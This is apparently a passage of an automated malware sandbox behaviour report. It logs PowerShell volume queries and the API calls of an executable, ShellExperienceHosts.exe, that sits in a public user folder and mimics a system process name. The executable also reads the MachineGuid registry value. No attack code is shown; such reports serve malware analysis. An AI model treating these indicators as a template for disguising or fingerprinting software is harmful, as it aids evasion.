Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032DDF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,

3_2_032DDF10

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032E5D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

3_2_032E5D22

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032D6A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,

3_2_032D6A70

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

